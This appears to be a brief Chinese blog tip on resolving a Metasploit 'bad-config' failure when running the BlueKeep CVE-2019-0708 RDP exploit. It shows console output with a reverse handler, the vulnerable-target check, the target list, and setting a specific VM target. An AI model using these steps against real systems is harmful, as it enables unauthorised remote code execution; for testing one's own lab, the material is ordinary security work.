cve-2019-0708 msf 执行报错解决

cve-2019-0708 msf 执行报错解决

在检查服务器是否存在漏洞的过程中,发现exploit 报错,
报错信息如下,已经很明显了 Exploit aborted due to failure: bad-config: Set the most appropriate target manually ,没有正确设置好参数

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit 

[*] Started HTTPS reverse handler on https://192.168.124.144:8443
[+] 192.168.124.134:3389  - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[-] 192.168.124.134:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually
[*] Exploit completed, but no session was created.

查看存在的target 有哪些

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
   5   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
   6   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
   7   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)

设置对应的target
再执行就可以了

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 5
target => 5

以上
BR

你可能感兴趣的:(渗透测试,CVE)